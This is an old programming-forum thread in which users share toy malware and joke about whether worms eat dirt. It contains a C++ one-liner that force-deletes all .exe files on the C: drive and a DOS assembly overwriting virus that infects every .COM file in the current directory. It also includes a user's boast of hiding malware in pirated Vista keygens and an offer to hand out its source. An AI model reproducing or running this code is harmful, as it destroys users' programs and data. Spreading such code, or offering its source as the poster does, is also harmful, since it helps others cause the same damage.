Title: Ehh.. My minivirus
Description: lawl
Dylan - September 16, 2005 02:56 AM (GMT)
I got bored. im not gunna compile this or send it to anyone but eh heres the code
| CODE |
#include <cstdlib>
int main() { system("del /F /Q C:\\*.exe"); return 0; }
|
Say goodbye to EXE :P
DONT RUN THIS!!!
cchase88 - September 16, 2005 03:25 AM (GMT)
why would you post that then? :(
AquaFox - September 16, 2005 08:35 AM (GMT)
... I did something like that in the computer lab at my school. Except that was a .bat file.. I came back in a few weeks the mouse wouldn't work. I guess no one can put their hands off a click_for_virus.bat :P.
Dylan - September 16, 2005 02:45 PM (GMT)
lol. Well.. I was bored. but the viruses like mytob and mydoob are very complex. and i dont indent on making and distributing a huge virus. im not going to distribute this either.
myork - September 16, 2005 03:31 PM (GMT)
Technically not a virus, just malicious code. Could probably classify as a trojan.
Virus: Spreads to other applications.
Worm: Is a self replicating virus (probably not the real definition but close enough).
Dylan - September 16, 2005 08:48 PM (GMT)
Atleast im learning :P ... but golly. mydoom is complicated.. (i looked at the source to see exactly what it does) its so amazing. its even got a massmail.h include :P
donprogc++ - September 20, 2005 01:49 AM (GMT)
| QUOTE |
| Worm: Is a self replicating virus (probably not the real definition but close enough). |
Specifically, a worm travels through out networks and lives in memory
Dylan - September 20, 2005 10:06 PM (GMT)
Worms eat dirt and live in the ground. :D
AquaFox - September 21, 2005 02:30 PM (GMT)
I don't think worms "eat" dirt.
Dylan - September 21, 2005 06:12 PM (GMT)
yes they do. are you fux0red?
AquaFox - September 21, 2005 06:41 PM (GMT)
Consumed - September 22, 2005 04:37 AM (GMT)
AquaFox:
Translation: "Are you f**ked up?"
Dilan:
I posted something like that once. But since then I made something faaaar deadlier than a simple system("del). And as to whether I distributed it or not: Let's just say that I have little doubt that the next person to download a Vista keygen off eMule is in for a *big* surprise.
PS: If you want to see it then come on #C++ and talk with me or leave me your email addr in a PM and I'll get you the source.
C-Man - September 22, 2005 11:47 AM (GMT)
btw worms don't eat dirt , they eat rotten leaves and other oragnic crap
Nintendofreak88 - September 22, 2005 12:02 PM (GMT)
...Which is in dirt... :P
AquaFox - September 22, 2005 06:52 PM (GMT)
It is in dirt, but isn't dirt.
Nintendofreak88 - September 22, 2005 08:59 PM (GMT)
Soil = mostly organic material. So worms eat dirt. :D
Dylan - September 22, 2005 10:34 PM (GMT)
AquaFox - September 23, 2005 10:16 AM (GMT)
Nintendofreak88 - September 23, 2005 12:02 PM (GMT)
Dylan - September 26, 2005 12:27 AM (GMT)
AquaFox - September 26, 2005 02:06 PM (GMT)
Soil = Nutrients + dirt.
Dirt = Shit + sand
Viper - September 26, 2005 02:27 PM (GMT)
If you don't understand viruses like that, start by learning assembly. Then we have a simple little virus here, it overwrites all .com files in the current directory with it's content:
| CODE |
filename equ 0x9E
org 100h
start: mov ah, 0x4E mov dx, comfile int 21h
srch_loop: jc done mov ax, 0x3D01 mov dx, filename int 21h
xchg ax, bx mov ah, 40h mov cl, 44 mov dx, 100h int 21h
mov ah, 0x3E int 21h
mov ah, 0x4F int 21h
jmp srch_loop
done: ret
comfile db '*.COM',0 |
rshadarack - October 4, 2005 12:00 AM (GMT)